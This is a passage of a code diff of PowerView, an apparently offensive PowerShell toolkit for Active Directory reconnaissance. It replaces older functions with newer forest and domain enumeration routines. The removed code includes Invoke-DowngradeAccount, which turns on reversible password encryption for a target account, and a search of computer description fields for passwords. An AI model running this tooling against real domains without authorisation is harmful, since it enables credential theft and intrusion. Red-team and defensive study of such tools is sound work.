$ObjectSearcher.filter = "(&(objectsid=$SID)$Filter)" + elseif ($PSBoundParameters['Domain']) { + $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $Domain) + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext) } - elseif($Name) { - $ObjectSearcher.filter = "(&(name=$Name)$Filter)" + catch { + Write-Verbose "[Get-Domain] The specified domain '$Domain' does not exist, could not be contacted, or there isn't an existing trust : $_" } - elseif($SamAccountName) { - $ObjectSearcher.filter = "(&(samAccountName=$SamAccountName)$Filter)" + } + else { + try { + [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() } - - $Results = $ObjectSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - if($ReturnRaw) { - $_ - } - else { - # convert/process the LDAP fields for each result - Convert-LDAPProperty -Properties $_.Properties - } + catch { + Write-Verbose "[Get-Domain] Error retrieving the current domain: $_" } - $Results.dispose() - $ObjectSearcher.dispose() } } } -function Set-ADObject { +function Get-DomainController { <# - .SYNOPSIS - - Takes a SID, name, or SamAccountName to query for a specified - domain object, and then sets a specified 'PropertyName' to a - specified 'PropertyValue'. +.SYNOPSIS - .PARAMETER SID +Return the domain controllers for the current (or specified) domain. - The SID of the domain object you're querying for. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Get-Domain - .PARAMETER Name +.DESCRIPTION - The Name of the domain object you're querying for. +Enumerates the domain controllers for the current or specified domain. +By default built in .NET methods are used. The -LDAP switch uses Get-DomainComputer +to search for domain controllers. - .PARAMETER SamAccountName +.PARAMETER Domain - The SamAccountName of the domain object you're querying for. +The domain to query for domain controllers, defaults to the current domain. - .PARAMETER Domain +.PARAMETER Server - The domain to query for objects, defaults to the current domain. +Specifies an Active Directory server (domain controller) to bind to. - .PARAMETER DomainController +.PARAMETER LDAP - Domain controller to reflect LDAP queries through. +Switch. Use LDAP queries to determine the domain controllers instead of built in .NET methods. - .PARAMETER Filter +.PARAMETER Credential - Additional LDAP filter string for the query. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - .PARAMETER PropertyName +.EXAMPLE - The property name to set. +Get-DomainController -Domain 'test.local' - .PARAMETER PropertyValue +Determine the domain controllers for 'test.local'. - The value to set for PropertyName +.EXAMPLE - .PARAMETER PropertyXorValue +Get-DomainController -Domain 'test.local' -LDAP - Integer value to binary xor (-bxor) with the current int value. +Determine the domain controllers for 'test.local' using LDAP queries. - .PARAMETER ClearValue +.EXAMPLE - Switch. Clear the value of PropertyName +'test.local' | Get-DomainController - .PARAMETER PageSize +Determine the domain controllers for 'test.local'. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .PARAMETER Credential +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainController -Credential $Cred - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.OUTPUTS - .EXAMPLE +PowerView.Computer - PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName countrycode -PropertyValue 0 - - Set the countrycode for matt.admin to 0 +Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified. - .EXAMPLE +System.DirectoryServices.ActiveDirectory.DomainController - PS C:\> Set-ADObject -SamAccountName matt.admin -PropertyName useraccountcontrol -PropertyXorValue 65536 - - Set the password not to expire on matt.admin +If -LDAP isn't specified. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.Computer')] + [OutputType('System.DirectoryServices.ActiveDirectory.DomainController')] [CmdletBinding()] - Param ( - [String] - $SID, - - [String] - $Name, - - [String] - $SamAccountName, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] [String] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $DomainController, - - [String] - $Filter, - - [Parameter(Mandatory = $True)] - [String] - $PropertyName, - - $PropertyValue, - - [Int] - $PropertyXorValue, + $Server, [Switch] - $ClearValue, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $LDAP, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - $Arguments = @{ - 'SID' = $SID - 'Name' = $Name - 'SamAccountName' = $SamAccountName - 'Domain' = $Domain - 'DomainController' = $DomainController - 'Filter' = $Filter - 'PageSize' = $PageSize - 'Credential' = $Credential - } - # splat the appropriate arguments to Get-ADObject - $RawObject = Get-ADObject -ReturnRaw @Arguments - - try { - # get the modifiable object for this search result - $Entry = $RawObject.GetDirectoryEntry() - - if($ClearValue) { - Write-Verbose "Clearing value" - $Entry.$PropertyName.clear() - $Entry.commitchanges() - } + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Domain']) { $Arguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } - elseif($PropertyXorValue) { - $TypeName = $Entry.$PropertyName[0].GetType().name + if ($PSBoundParameters['LDAP'] -or $PSBoundParameters['Server']) { + if ($PSBoundParameters['Server']) { $Arguments['Server'] = $Server } - # UAC value references- https://support.microsoft.com/en-us/kb/305144 - $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue - $Entry.$PropertyName = $PropertyValue -as $TypeName - $Entry.commitchanges() - } + # UAC specification for domain controllers + $Arguments['LDAPFilter'] = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' + Get-DomainComputer @Arguments + } else { - $Entry.put($PropertyName, $PropertyValue) - $Entry.setinfo() + $FoundDomain = Get-Domain @Arguments + if ($FoundDomain) { + $FoundDomain.DomainControllers + } } } - catch { - Write-Warning "Error setting property $PropertyName to value '$PropertyValue' for object $($RawObject.Properties.samaccountname) : $_" - } } -function Invoke-DowngradeAccount { +function Get-Forest { <# - .SYNOPSIS - - Set reversible encryption on a given account and then force the password - to be set on next user login. To repair use "-Repair". +.SYNOPSIS - .PARAMETER SamAccountName +Returns the forest object for the current (or specified) forest. - The SamAccountName of the domain object you're querying for. +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID - .PARAMETER Name +.DESCRIPTION - The Name of the domain object you're querying for. +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. - .PARAMETER Domain +.PARAMETER Forest - The domain to query for objects, defaults to the current domain. +The forest name to query for, defaults to the current forest. - .PARAMETER DomainController +.PARAMETER Credential - Domain controller to reflect LDAP queries through. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. - .PARAMETER Filter +.EXAMPLE - Additional LDAP filter string for the query. +Get-Forest -Forest external.domain - .PARAMETER Repair +.EXAMPLE - Switch. Unset the reversible encryption flag and force password reset flag. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred - .PARAMETER Credential +.OUTPUTS - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +System.Management.Automation.PSCustomObject - .EXAMPLE - - PS> Invoke-DowngradeAccount -SamAccountName jason - - Set reversible encryption on the 'jason' account and force the password to be changed. - - .EXAMPLE - - PS> Invoke-DowngradeAccount -SamAccountName jason -Repair - - Unset reversible encryption on the 'jason' account and remove the forced password change. +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.Management.Automation.PSCustomObject')] [CmdletBinding()] - Param ( - [Parameter(ParameterSetName = 'SamAccountName', Position=0, ValueFromPipeline=$True)] - [String] - $SamAccountName, - - [Parameter(ParameterSetName = 'Name')] - [String] - $Name, - - [String] - $Domain, - - [String] - $DomainController, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] [String] - $Filter, - - [Switch] - $Repair, + $Forest, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - process { - $Arguments = @{ - 'SamAccountName' = $SamAccountName - 'Name' = $Name - 'Domain' = $Domain - 'DomainController' = $DomainController - 'Filter' = $Filter - 'Credential' = $Credential - } - - # splat the appropriate arguments to Get-ADObject - $UACValues = Get-ADObject @Arguments | select useraccountcontrol | ConvertFrom-UACValue + PROCESS { + if ($PSBoundParameters['Credential']) { - if($Repair) { + Write-Verbose "[Get-Forest] Using alternate credentials for Get-Forest" - if($UACValues.Keys -contains "ENCRYPTED_TEXT_PWD_ALLOWED") { - # if reversible encryption is set, unset it - Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 + if ($PSBoundParameters['Forest']) { + $TargetForest = $Forest + } + else { + # if no domain is supplied, extract the logon domain from the PSCredential passed + $TargetForest = $Credential.GetNetworkCredential().Domain + Write-Verbose "[Get-Forest] Extracted domain '$Forest' from -Credential" } - # unset the forced password change - Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue -1 - } + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $TargetForest, $Credential.UserName, $Credential.GetNetworkCredential().Password) + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$TargetForest' does not exist, could not be contacted, there isn't an existing trust, or the specified credentials are invalid: $_" + $Null + } + } + elseif ($PSBoundParameters['Forest']) { + $ForestContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $Forest) + try { + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetForest($ForestContext) + } + catch { + Write-Verbose "[Get-Forest] The specified forest '$Forest' does not exist, could not be contacted, or there isn't an existing trust: $_" + return $Null + } + } else { + # otherwise use the current forest + $ForestObject = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() + } - if($UACValues.Keys -contains "DONT_EXPIRE_PASSWORD") { - # if the password is set to never expire, unset - Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 65536 + if ($ForestObject) { + # get the SID of the forest root + if ($PSBoundParameters['Credential']) { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name -Credential $Credential).objectsid } - - if($UACValues.Keys -notcontains "ENCRYPTED_TEXT_PWD_ALLOWED") { - # if reversible encryption is not set, set it - Set-ADObject @Arguments -PropertyName useraccountcontrol -PropertyXorValue 128 + else { + $ForestSid = (Get-DomainUser -Identity "krbtgt" -Domain $ForestObject.RootDomain.Name).objectsid } - # force the password to be changed on next login - Set-ADObject @Arguments -PropertyName pwdlastset -PropertyValue 0 + $Parts = $ForestSid -Split '-' + $ForestSid = $Parts[0..$($Parts.length-2)] -join '-' + $ForestObject | Add-Member NoteProperty 'RootDomainSid' $ForestSid + $ForestObject } } } -function Get-ComputerProperty { +function Get-ForestDomain { <# - .SYNOPSIS - - Returns a list of all computer object properties. If a property - name is specified, it returns all [computer:property] values. +.SYNOPSIS - Taken directly from @obscuresec's post: - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html +Return all domains for the current (or specified) forest. - .PARAMETER Properties +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest - Return property names for computers. +.DESCRIPTION - .PARAMETER Domain +Returns all domains for the current forest or the forest specified +by -Forest X. - The domain to query for computer properties, defaults to the current domain. +.PARAMETER Forest - .PARAMETER DomainController +Specifies the forest name to query for domains. - Domain controller to reflect LDAP queries through. +.PARAMETER Credential - .PARAMETER PageSize +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target forest. - The PageSize to set for the LDAP searcher object. +.EXAMPLE - .PARAMETER Credential +Get-ForestDomain - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.EXAMPLE - .EXAMPLE +Get-ForestDomain -Forest external.local - PS C:\> Get-ComputerProperty -Domain testing - - Returns all user properties for computers in the 'testing' domain. +.EXAMPLE - .EXAMPLE +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred - PS C:\> Get-ComputerProperty -Properties ssn,lastlogon,location - - Returns all an array of computer/ssn/lastlogin/location combinations - for computers in the current domain. +.OUTPUTS - .LINK - - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html +System.DirectoryServices.ActiveDirectory.Domain #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.Domain')] [CmdletBinding()] - param( - [String[]] - $Properties, - - [String] - $Domain, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] [String] - $DomainController, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $Forest, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - if($Properties) { - # extract out the set of all properties for each object - $Properties = ,"name" + $Properties | Sort-Object -Unique - Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -Property $Properties - } - else { - # extract out just the property names - Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -PageSize $PageSize | Select-Object -first 1 | Get-Member -MemberType *Property | Select-Object -Property "Name" + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + if ($ForestObject) { + $ForestObject.Domains + } } } -function Find-ComputerField { +function Get-ForestGlobalCatalog { <# - .SYNOPSIS - - Searches computer object fields for a given word (default *pass*). Default - field being searched is 'description'. - - Taken directly from @obscuresec's post: - http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html +.SYNOPSIS - .PARAMETER SearchTerm +Return all global catalogs for the current (or specified) forest. - Term to search for, default of "pass". +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest - .PARAMETER SearchField +.DESCRIPTION - User field to search in, default of "description". +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. - .PARAMETER ADSpath +.PARAMETER Forest - The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" - Useful for OU queries. +Specifies the forest name to query for global catalogs. - .PARAMETER Domain +.PARAMETER Credential - Domain to search computer fields for, defaults to the current domain. +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - .PARAMETER DomainController +.EXAMPLE - Domain controller to reflect LDAP queries through. +Get-ForestGlobalCatalog - .PARAMETER PageSize +.EXAMPLE - The PageSize to set for the LDAP searcher object. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred - .PARAMETER Credential +.OUTPUTS - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. - - .EXAMPLE - - PS C:\> Find-ComputerField -SearchTerm backup -SearchField info - - Find computer accounts with "backup" in the "info" field. +System.DirectoryServices.ActiveDirectory.GlobalCatalog #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('System.DirectoryServices.ActiveDirectory.GlobalCatalog')] [CmdletBinding()] - param( - [Parameter(Position=0,ValueFromPipeline=$True)] - [Alias('Term')] - [String] - $SearchTerm = 'pass', - - [Alias('Field')] - [String] - $SearchField = 'description', - - [String] - $ADSpath, - - [String] - $Domain, - + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [ValidateNotNullOrEmpty()] [String] - $DomainController, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $Forest, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - process { - Get-NetComputer -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -FullData -Filter "($SearchField=*$SearchTerm*)" -PageSize $PageSize | Select-Object samaccountname,$SearchField + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } + + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + $ForestObject.FindAllGlobalCatalogs() + } } } -function Get-NetOU { +function Get-ForestSchemaClass { <# - .SYNOPSIS +.SYNOPSIS - Gets a list of all current OUs in a domain. +Helper that returns the Active Directory schema classes for the current +(or specified) forest or returns just the schema class specified by +-ClassName X. - .PARAMETER OUName +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest - The OU name to query for, wildcards accepted. +.DESCRIPTION - .PARAMETER GUID +Uses Get-Forest to retrieve the current (or specified) forest. By default, +the .FindAllClasses() method is executed, returning a collection of +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] results. +If "-FindClass X" is specified, the [DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] +result for the specified class name is returned. - Only return OUs with the specified GUID in their gplink property. +.PARAMETER ClassName - .PARAMETER Domain +Specifies a ActiveDirectorySchemaClass name in the found schema to return. - The domain to query for OUs, defaults to the current domain. +.PARAMETER Forest - .PARAMETER DomainController +The forest to query for the schema, defaults to the current forest. - Domain controller to reflect LDAP queries through. +.PARAMETER Credential - .PARAMETER ADSpath +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. - The LDAP source to search through. +.EXAMPLE - .PARAMETER FullData +Get-ForestSchemaClass - Switch. Return full OU objects instead of just object names (the default). +Returns all domain schema classes for the current forest. - .PARAMETER PageSize +.EXAMPLE - The PageSize to set for the LDAP searcher object. +Get-ForestSchemaClass -Forest dev.testlab.local - .PARAMETER Credential +Returns all domain schema classes for the external.local forest. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.EXAMPLE - .EXAMPLE +Get-ForestSchemaClass -ClassName user -Forest external.local - PS C:\> Get-NetOU - - Returns the current OUs in the domain. +Returns the user schema class for the external.local domain. - .EXAMPLE +.EXAMPLE - PS C:\> Get-NetOU -OUName *admin* -Domain testlab.local - - Returns all OUs with "admin" in their name in the testlab.local domain. +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestSchemaClass -ClassName user -Forest external.local -Credential $Cred - .EXAMPLE +Returns the user schema class for the external.local domain using +the specified alternate credentials. - PS C:\> Get-NetOU -GUID 123-... - - Returns all OUs with linked to the specified group policy object. +.OUTPUTS - .EXAMPLE +[DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass] - PS C:\> "*admin*","*server*" | Get-NetOU - - Get the full OU names for the given search terms piped on the pipeline. +An ActiveDirectorySchemaClass returned from the found schema. #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([System.DirectoryServices.ActiveDirectory.ActiveDirectorySchemaClass])] [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] - [String] - $OUName = '*', - - [String] - $GUID, - - [String] - $Domain, - - [String] - $DomainController, + Param( + [Parameter(Position = 0, ValueFromPipeline = $True)] + [Alias('Class')] + [ValidateNotNullOrEmpty()] + [String[]] + $ClassName, + [Alias('Name')] + [ValidateNotNullOrEmpty()] [String] - $ADSpath, - - [Switch] - $FullData, - - [ValidateRange(1,10000)] - [Int] - $PageSize = 200, + $Forest, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - begin { - $OUSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize - } - process { - if ($OUSearcher) { - if ($GUID) { - # if we're filtering for a GUID in .gplink - $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName)(gplink=*$GUID*))" - } - else { - $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName))" - } + PROCESS { + $Arguments = @{} + if ($PSBoundParameters['Forest']) { $Arguments['Forest'] = $Forest } + if ($PSBoundParameters['Credential']) { $Arguments['Credential'] = $Credential } - try { - $Results = $OUSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - if ($FullData) { - # convert/process the LDAP fields for each result - $OU = Convert-LDAPProperty -Properties $_.Properties - $OU.PSObject.TypeNames.Add('PowerView.OU') - $OU - } - else { - # otherwise just returning the ADS paths of the OUs - $_.properties.adspath - } + $ForestObject = Get-Forest @Arguments + + if ($ForestObject) { + if ($PSBoundParameters['ClassName']) { + ForEach ($TargetClass in $ClassName) { + $ForestObject.Schema.FindClass($TargetClass) } - $Results.dispose() - $OUSearcher.dispose() } - catch { - Write-Warning $_ + else { + $ForestObject.Schema.FindAllClasses() } } } } -function Get-NetSite { +function Find-DomainObjectPropertyOutlier { <# - .SYNOPSIS +.SYNOPSIS + +Finds user/group/computer objects in AD that have 'outlier' properties set. + +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: Get-Domain, Get-DomainUser, Get-DomainGroup, Get-DomainComputer + +.DESCRIPTION + +A 'reference' set of property names is calculated, either from a standard set preserved +for user/group/computers, or from the array of names passed to -ReferencePropertySet, or +from the property names of the passed -ReferenceObject. Every user/group/computer object +(depending on determined class) are enumerated, and for each object, if the object has a +'non-standard' property set (meaning a property not held by the reference set), the object's +samAccountName, property name, and property value are output to the pipeline. + +.PARAMETER ClassName + +Specifies the AD object class to find property outliers for, 'user', 'group', or 'computer'. +If -ReferenceObject is specified, this will be automatically extracted, if possible. + +.PARAMETER ReferencePropertySet + +Specifies an array of property names to diff against the class schema. - Gets a list of all current sites in a domain. +.PARAMETER ReferenceObject - .PARAMETER SiteName +Specicifes the PowerView user/group/computer object to extract property names +from to use as the reference set. - Site filter string, wildcards accepted. +.PARAMETER Domain - .PARAMETER Domain +Specifies the domain to use for the query, defaults to the current domain. - The domain to query for sites, defaults to the current domain. +.PARAMETER LDAPFilter - .PARAMETER DomainController +Specifies an LDAP query string that is used to filter Active Directory objects. - Domain controller to reflect LDAP queries through. +.PARAMETER SearchBase - .PARAMETER ADSpath +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. - The LDAP source to search through. +.PARAMETER Server - .PARAMETER GUID +Specifies an Active Directory server (domain controller) to bind to. - Only return site with the specified GUID in their gplink property. +.PARAMETER SearchScope - .PARAMETER FullData +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). - Switch. Return full site objects instead of just object names (the default). +.PARAMETER ResultPageSize - .PARAMETER PageSize +Specifies the PageSize to set for the LDAP searcher object. - The PageSize to set for the LDAP searcher object. +.PARAMETER ServerTimeLimit - .PARAMETER Credential +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. - A [Management.Automation.PSCredential] object of alternate credentials - for connection to the target domain. +.PARAMETER Tombstone - .EXAMPLE +Switch. Specifies that the searcher should also return deleted/tombstoned objects. - PS C:\> Get-NetSite -Domain testlab.local -FullData - - Returns the full data objects for all sites in testlab.local +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'User' + +Enumerates users in the current domain with 'outlier' properties filled in. + +.EXAMPLE + +Find-DomainObjectPropertyOutlier -ClassName 'Group' -Domain external.local + +Enumerates groups in the external.local forest/domain with 'outlier' properties filled in. + +.EXAMPLE + +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier + +Enumerates computers in the current domain with 'outlier' properties filled in. + +.OUTPUTS + +PowerView.PropertyOutlier + +Custom PSObject with translated object property outliers. #> - [CmdletBinding()] - Param ( - [Parameter(ValueFromPipeline=$True)] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.PropertyOutlier')] + [CmdletBinding(DefaultParameterSetName = 'ClassName')] + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'ClassName')] + [Alias('Class')] + [ValidateSet('User', 'Group', 'Computer')] [String] - $SiteName = "*", + $ClassName, + [ValidateNotNullOrEmpty()] + [String[]] + $ReferencePropertySet, + + [Parameter(ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ReferenceObject')] + [PSCustomObject] + $ReferenceObject, + + [ValidateNotNullOrEmpty()] [String] $Domain, + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] [String] - $DomainController, + $SearchBase, + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] [String] - $ADSpath, + $Server, + [ValidateSet('Base', 'OneLevel', 'Subtree')] [String] - $GUID, + $SearchScope = 'Subtree', - [Switch] - $FullData, + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, - [ValidateRange(1,10000)] + [ValidateRange(1, 10000)] [Int] - $PageSize = 200, + $ServerTimeLimit, + + [Switch] + $Tombstone, [Management.Automation.PSCredential] - $Credential + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty ) - begin { - $SiteSearcher = Get-DomainSearcher -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSprefix "CN=Sites,CN=Configuration" -PageSize $PageSize - } - process { - if($SiteSearcher) { + BEGIN { + $UserReferencePropertySet = @('admincount','accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','description', 'displayname','distinguishedname','dscorepropagationdata','givenname','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','lockouttime','logoncount','memberof','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','primarygroupid','pwdlastset','samaccountname','samaccounttype','sn','useraccountcontrol','userprincipalname','usnchanged','usncreated','whenchanged','whencreated') + + $GroupReferencePropertySet = @('admincount','cn','description','distinguishedname','dscorepropagationdata','grouptype','instancetype','iscriticalsystemobject','member','memberof','name','objectcategory','objectclass','objectguid','objectsid','samaccountname','samaccounttype','systemflags','usnchanged','usncreated','whenchanged','whencreated') + + $ComputerReferencePropertySet = @('accountexpires','badpasswordtime','badpwdcount','cn','codepage','countrycode','distinguishedname','dnshostname','dscorepropagationdata','instancetype','iscriticalsystemobject','lastlogoff','lastlogon','lastlogontimestamp','localpolicyflags','logoncount','msds-supportedencryptiontypes','name','objectcategory','objectclass','objectguid','objectsid','operatingsystem','operatingsystemservicepack','operatingsystemversion','primarygroupid','pwdlastset','samaccountname','samaccounttype','serviceprincipalname','useraccountcontrol','usnchanged','usncreated','whenchanged','whencreated') + + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } - if ($GUID) { - # if we're filtering for a GUID in .gplink - $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName)(gplink=*$GUID*))" + # Domain / Credential + if ($PSBoundParameters['Domain']) { + if ($PSBoundParameters['Credential']) { + $TargetForest = Get-Domain -Domain $Domain | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name } else { - $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName))" + $TargetForest = Get-Domain -Domain $Domain -Credential $Credential | Select-Object -ExpandProperty Forest | Select-Object -ExpandProperty Name } - - try { - $Results = $SiteSearcher.FindAll() - $Results | Where-Object {$_} | ForEach-Object { - if ($FullData) { - # convert/process the LDAP fields for each result - $Site = Convert-LDAPProperty -Properties $_.Properties - $Site.PSObject.TypeNames.Add('PowerView.Site') - $Site - } - else { - # otherwise just return the site name - $_.properties.name - } - } - $Results.dispose() - $SiteSearcher.dispose() + Write-Verbose "[Find-DomainObjectPropertyOutlier] Enumerated forest '$TargetForest' for target domain '$Domain'" + } + + $SchemaArguments = @{} + if ($PSBoundParameters['Credential']) { $SchemaArguments['Credential'] = $Credential } + if ($TargetForest) { + $SchemaArguments['Forest'] = $TargetForest + } + } + + PROCESS { + + if ($PSBoundParameters['ReferencePropertySet']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Using specified -ReferencePropertySet" + $ReferenceObjectProperties = $ReferencePropertySet + } + elseif ($PSBoundParameters['ReferenceObject']) { + Write-Verbose "[Find-DomainObjectPropertyOutlier] Extracting property names from -ReferenceObject to use as the reference property set" + $ReferenceObjectProperties = Get-Member -InputObject $ReferenceObject -MemberType NoteProperty | Select-Object -Expand Name + $ReferenceObjectClass = $ReferenceObject.objectclass | Select-Object -Last 1 + Write-Verbose "[Find-DomainObjectPropertyOutlier] Calculated 